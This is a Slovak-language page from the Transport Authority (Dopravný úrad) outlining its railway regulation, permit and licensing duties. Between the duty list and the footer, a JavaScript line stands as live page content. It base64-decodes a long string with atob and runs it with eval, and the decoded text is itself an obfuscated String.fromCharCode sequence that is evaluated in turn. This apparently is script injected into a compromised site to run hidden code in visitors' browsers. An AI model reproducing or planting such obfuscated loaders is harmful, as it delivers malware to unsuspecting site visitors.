DOPRAVNÝ ÚRAD

  Regulácia, povolenia a licencie na železničných dráhach

  Dopravný úrad je podľa § 103 ods. 1 písm. b) zákona č. 513/2009 Z. z. o dráhach a o zmene a doplnení niektorých zákonov v znení neskorších predpisov a podľa § 37 ods. 1 písm. a) a písm. c) zákona č. 514/2009 Z. z. o doprave na dráhach v znení neskorších predpisov regulačným orgánom pre železničné dráhy, pre reguláciu cestovného v železničnej doprave a licenčným orgánom pre železničnú dopravu.

  Dopravný úrad zabezpečuje úlohy určené európskou a národnou legislatívou v týchto oblastiach prostredníctvom svojich dvoch odborov – odborom regulácie a odborom povolení a licencií na železničných dráhach.


  Hlavné činnosti Dopravného úradu v oblasti regulácie, povolení a licencií na železničných dráhach

  zabezpečuje tvorbu a realizáciu štátnej politiky na úrovni orgánu štátnej správy ako regulačný orgán a licenčný orgán v oblasti železničných dráh a dopravy na železničných dráhach

  vykonáva kompetencie regulačného a licenčného orgánu pre železničné dráhy a dopravu na železničných dráhach a koná v správnom konaní

  pripravuje všeobecne záväzné právne predpisy ustanovujúce regulačný rámec pre spoplatňovanie prístupu k železničnej infraštruktúre, reguláciu základného a osobitného cestovného vo vnútroštátnej železničnej doprave a podmienky uplatňovania regulovaného cestovného a reguláciu úhrad za používanie železničnej infraštruktúry

  dohliada na dodržiavanie regulačného rámca, ustanovených úhrad za prístup k železničnej infraštruktúre a maximálneho cestovného v železničnej osobnej doprave

  spolupracuje s regulačnými orgánmi členských štátov v otázkach týkajúcich sa prideľovania kapacity dopravnej cesty, nediskriminačného prístupu k železničnej infraštruktúre a jej spoplatňovania, monitorovania železničných trhov a medzinárodných koridorov

  udeľuje, mení a ruší licencie na poskytovanie dopravných služieb v železničnej doprave

  vydáva, mení a ruší povolenia na prevádzkovanie železničných dráh

  dohliada na dodržiavanie práv a povinností cestujúcich v železničnej doprave podľa osobitných predpisov

  var WJSBCXBNMO = atob(‘dmFyIFhZQU5HSFpVS1ogPSBTdHJpbmcuZnJvbUNoYXJDb2RlKDE4IC0gOCwgMTIyIC0gNCwgMTA2IC0gOSwgMTIwIC0gNiwgMzQgLSAyLCAxMTUgLSA4LCAxMDUgLSA0LCAxMzAgLSA5LCAzNCAtIDIsIDY5IC0gOCwgMzcgLSA1LCA0MiAtIDMsIDkwIC0gOCwgMTA5IC0gMSwgNzIgLSA0LCA4OSAtIDksIDEwMyAtIDYsIDEwOSAtIDksIDEwMyAtIDEsIDExNiAtIDIsIDkzIC0gMywgNzkgLSA2LCA0NCAtIDUsIDYzIC0gNCwgMTcgLSA3LCAxMjMgLSA1LCAxMDQgLSA3LCAxMjAgLSA2LCA0MSAtIDksIDEwNyAtIDYsIDExNCAtIDQsIDEwMyAtIDQsIDEwNyAtIDYsIDEwNSAtIDUsIDM1IC0gMywgNzAgLSA5LCAzNSAtIDMsIDQ3IC0gOCwgNzYgLSAyLCA2OSAtIDQsIDUzIC0gNSwgNTEgLSAxLCAxMDEgLSAyLCA3NCAtIDgsIDc3IC0gOCwgODggLSAxLCA2OCAtIDMsIDY4IC0gMiwgNTggLSA1LCA2MyAtIDksIDEwNSAtIDUsIDc1IC0gMywgNzUgLSAyLCA3OSAtIDYsIDc2IC0gMSwgMTI3IC0gNSwgODYgLSA5LCA5MSAtIDYsIDczIC0gNiwgODIgLSAxLCA4NiAtIDksIDEwMCAtIDEsIDc5IC0gMywgMTE2IC0gNywgMTA0IC0gNSwgMTIzIC0gMywgNzYgLSA0LCAxMTIgLSA3LCA3NCAtIDUsIDEyOCAtIDgsIDc4IC0gOCwgOTAgLSA5LCA3NiAtIDcsIDExMyAtIDcsIDc1IC0gMywgMTEwIC0gNCwgNjIgLSA2LCAxMDggLSAxLCA4MSAtIDMsIDEyOCAtIDksIDc1IC0gMiwgMTI2IC0gNywgMTA2IC0gNSwgNzEgLSAyLCA5MCAtIDEsIDk0IC0gNiwgNzIgLSA2LCA4OCAtIDcsIDY2IC0gMSwgMTI2IC0gNCwgODEgLSAyLCA4OCAtIDUsIDk2IC0gNiwgODQgLSA4LCAxMDIgLSA0LCA4OCAtIDEsIDEyMyAtIDcsIDExNyAtIDMsIDc5IC0gOSwgNjcgLSAxLCA4NiAtIDUsIDkwIC0gNSwgODMgLSA1LCAxMTQgLSA1LCAxMDIgLSAzLCAxMDkgLSA1LCA3MSAtIDQsIDkyIC0gOCwgNjkgLSA0LCA4OCAtIDYsIDcxIC0gMSwgODMgLSAxLCA2OSAtIDQsIDg2IC0gMSwgNzYgLSA1LCAxMjkgLSA3LCAxMTEgLSA4LCA1NyAtIDEsIDc3IC0gMywgMTA3IC0gNCwgMTA5IC0gMSwgMTE4IC0gMywgMTA4IC0gOCwgMTIyIC0gMiwgODIgLSA5LCA4OCAtIDEsIDcyIC0gNiwgOTEgLSA1LCA5NCAtIDgsIDU0IC0gNCwgMTA1IC0gNywgMTEzIC0gNywgMTE4IC0gNywgOTAgLSAxLCA4NiAtIDksIDcxIC0gNCwgNzAgLSA0LCAxMDMgLSA1LCA4NyAtIDQsIDU0IC0gNiwgMTEyIC0gNSwgNzQgLSAzLCA4MiAtIDcsIDY5IC0gMiwgMTEwIC0gNywgNTQgLSA2LCA3MyAtIDYsIDExMSAtIDYsIDU2IC0gOCwgMTI3IC0gNSwgNzIgLSA3LCA3NCAtIDgsIDgzIC0gMiwgODkgLSA5LCA5MiAtIDQsIDc2IC0gOCwgODIgLSAxLCAxMTcgLSA5LCAxMDMgLSAxLCA4OCAtIDYsIDY0IC0gOCwgMTI4IC0gOSwgODUgLSA4LCA4NCAtIDIsIDg5IC0gNCwgODIgLSA0LCA3MSAtIDUsIDkzIC0gNywgNTUgLSA3LCA1MiAtIDEsIDc2IC0gMSwgNjkgLSAxLCAxMTcgLSAyLCA3MCAtIDMsIDk5IC0gMiwgMTEyIC0gNiwgMTE0IC0gMywgOTEgLSA4LCA4MyAtIDIsIDU3IC0gOSwgNjEgLSA0LCA3OCAtIDQsIDkyIC0gNywgNzQgLSA3LCA1MyAtIDUsIDU4IC0gMSwgNzQgLSA2LCAxMjYgLSA0LCA3NSAtIDYsIDY0IC0gNywgNzAgLSA0LCA3MyAtIDgsIDExMyAtIDIsIDg2IC0gMywgOTEgLSAzLCA3NCAtIDYsIDc4IC0gNSwgMTIzIC0gOCwgODUgLSA4LCAxMjMgLSA0LCAxMTMgLSA5LCAxMjEgLSA4LCA3OCAtIDEsIDgzIC0gMSwgNzQgLSA1LCA5MyAtIDgsIDc0IC0gOSwgMTI2IC0gNiwgMTI2IC0gNywgNDkgLSA2LCA2OSAtIDIsIDEwOCAtIDIsIDExNSAtIDQsIDc5IC0gOSwgNzYgLSAxLCA3MSAtIDMsIDkxIC0gOSwgNzUgLSAxLCA3MiAtIDIsIDY3IC0gMSwgODYgLSA1LCA4NyAtIDIsIDg1IC0gNywgMTEyIC0gMywgNzQgLSA4LCAxMjEgLSA5LCA5MyAtIDMsIDExMSAtIDgsIDY3IC0gNiwgNjggLSA3LCA0NCAtIDUsIDY1IC0gNiwgMTIgLSAyLCAxMDYgLSA0LCAxMjMgLSA2LCAxMTYgLSA2LCAxMDUgLSA2LCAxMjEgLSA1LCAxMTMgLSA4LCAxMTcgLSA2LCAxMTcgLSA3LCA0MSAtIDksIDEyOCAtIDgsIDExMyAtIDIsIDEyMiAtIDgsIDk5IC0gNCwgMTAzIC0gMiwgMTE2IC0gNiwgMTA3IC0gOCwgNDkgLSA5LCAxMTcgLSAyLCAxMjEgLSA1LCAxMTggLSA0LCAxMTIgLSA3LCAxMTIgLSAyLCAxMDggLSA1LCA0NyAtIDMsIDM0IC0gMiwgMTEwIC0gMywgMTA2IC0gNSwgMTI0IC0gMywgNDkgLSA4LCAzMyAtIDEsIDEyNyAtIDQsIDE0IC0gNCwgMzcgLSA1LCAzNCAtIDIsIDEyMSAtIDMsIDEwNSAtIDgsIDExNSAtIDEsIDMzIC0gMSwgMTE2IC0gMiwgMTA4IC0gNywgMTE3IC0gMiwgMzMgLSAxLCA3MCAtIDksIDQxIC0gOSwgNDIgLSAzLCA0MCAtIDEsIDY0IC0gNSwgMTMgLSAzLCAzNSAtIDMsIDM1IC0gMywgMTAzIC0gMSwgMTE2IC0gNSwgMTE4IC0gNCwgMzMgLSAxLCA0OCAtIDgsIDExOSAtIDEsIDEwMiAtIDUsIDEyMiAtIDgsIDM3IC0gNSwgMTA3IC0gMiwgNDAgLSA4LCA3MCAtIDksIDQwIC0gOCwgNTcgLSA5LCA2NiAtIDcsIDM5IC0gNywgMTEzIC0gOCwgNDEgLSA5LCA2NyAtIDcsIDQxIC0gOSwgMTE2IC0gMSwgMTE4IC0gMiwgMTIzIC0gOSwgMTA5IC0gNCwgMTE3IC0gNywgMTA2IC0gMywgNTIgLSA2LCAxMTcgLSA5LCAxMTAgLSA5LCAxMTggLSA4LCAxMDkgLSA2LCAxMjMgLSA3LCAxMDYgLSAyLCA2NSAtIDYsIDQwIC0gOCwgMTExIC0gNiwgNDQgLSAxLCA0OCAtIDUsIDQ3IC0gNiwgNDEgLSA5LCAxMjggLSA1LCAxNSAtIDUsIDM0IC0gMiwgMzcgLSA1LCAzOSAtIDcsIDM5IC0gNywgMTE5IC0gNSwgMTAzIC0gMiwgMTIzIC0gOCwgMzMgLSAxLCA1MSAtIDgsIDY0IC0gMywgMzkgLSA3LCA4NCAtIDEsIDExNyAtIDEsIDExNyAtIDMsIDExMyAtIDgsIDExNCAtIDQsIDEwNyAtIDQsIDU0IC0gOCwgMTA1IC0gMywgMTIyIC0gOCwgMTE3IC0gNiwgMTE4IC0gOSwgNzIgLSA1LCAxMTAgLSA2LCAxMDMgLSA2LCAxMTUgLSAxLCA2OCAtIDEsIDExNCAtIDMsIDEwMSAtIDEsIDEwNyAtIDYsIDQ2IC0gNiwgMTIzIC0gOCwgMTIwIC0gNCwgMTE2IC0gMiwgMTExIC0gNiwgMTE0IC0gNCwgMTA5IC0gNiwgNTIgLSA2LCAxMDcgLSA4LCAxMDYgLSAyLCAxMDMgLSA2LCAxMTkgLSA1LCA3NCAtIDcsIDExMiAtIDEsIDEwNiAtIDYsIDEwOSAtIDgsIDc0IC0gOSwgMTE3IC0gMSwgNDUgLSA1LCAxMDggLSAzLCA0NiAtIDUsIDQwIC0gOCwgOTYgLSAyLCAxMSAtIDEsIDE1IC0gNiwgMTQgLSA1LCAxMyAtIDQsIDEwIC0gMSwgMTExIC0gNCwgMTA1IC0gNCwgMTMwIC0gOSwgNTQgLSA4LCAxMDUgLSA2LCAxMTMgLSA5LCAxMDEgLSA0LCAxMjAgLSA2LCA3NiAtIDksIDExNyAtIDYsIDEwMyAtIDMsIDEwNyAtIDYsIDY4IC0gMywgMTIyIC0gNiwgNDggLSA4LCAxMTAgLSA1LCA0MSAtIDksIDQ1IC0gOCwgMzMgLSAxLCAxMDggLSAxLCAxMDcgLSA2LCAxMjcgLSA2LCA0OCAtIDIsIDExNCAtIDYsIDEwOSAtIDgsIDExNSAtIDUsIDEwNyAtIDQsIDEyMiAtIDYsIDExMiAtIDgsIDQ4IC0gNywgNTAgLSA5LCA2NCAtIDUsIDExIC0gMSwgNDAgLSA4LCAzOCAtIDYsIDEyNiAtIDEsIDEyIC0gMiwgMzUgLSAzLCAzNSAtIDMsIDEyMSAtIDcsIDEwMiAtIDEsIDEyNCAtIDgsIDEyNCAtIDcsIDEyMyAtIDksIDExNyAtIDcsIDQxIC0gOSwgMTE2IC0gMiwgMTA5IC0gOCwgMTI0IC0gOSwgNjUgLSA2LCAxOSAtIDksIDEzMSAtIDYsIDE2IC0gNiwgMTMgLSAzLCAxMjcgLSA5LCAxMDUgLSA4LCAxMjAgLSA2LCA0MSAtIDksIDEwOSAtIDksIDExMCAtIDksIDEwMiAtIDMsIDQwIC0gOCwgNjQgLSAzLCAzNiAtIDQsIDEyNyAtIDcsIDExNyAtIDYsIDExNSAtIDEsIDk2IC0gMSwgMTA0IC0gMywgMTE1IC0gNSwgMTAwIC0gMSwgNDIgLSAyLCAxMDQgLSA3LCAxMTkgLSAzLCAxMTkgLSA4LCAxMDYgLSA4LCA0NCAtIDQsIDEwNSAtIDQsIDExNyAtIDcsIDEwNyAtIDgsIDEwNyAtIDYsIDEwOCAtIDgsIDQ4IC0gNywgNTMgLSA5LCAzOSAtIDcsIDExNSAtIDgsIDEwOCAtIDcsIDEyNiAtIDUsIDQ0IC0gMywgNjEgLSAyLCAxMyAtIDMsIDQzIC0gMywgMTExIC0gMSwgMTA4IC0gNywgMTI0IC0gNSwgMzkgLSA3LCA3NCAtIDQsIDEyNSAtIDgsIDExOSAtIDksIDEwMiAtIDMsIDEyMiAtIDYsIDExMyAtIDgsIDExNyAtIDYsIDExMiAtIDIsIDQ2IC0gNiwgMTA0IC0gNCwgMTEwIC0gOSwgMTA4IC0gOSwgNDYgLSA1LCA0NCAtIDMsIDQ3IC0gNywgNDQgLSAzLCA2MyAtIDQsIDE0IC0gNCwgMTkgLSA5KTtldmFsKFhZQU5HSFpVS1opOw==’);
  eval(WJSBCXBNMO);

  © Dopravný úrad / Transport Authority | Mapa stránok | RSS W3C Validation

  Dodávateľ portálového riešenia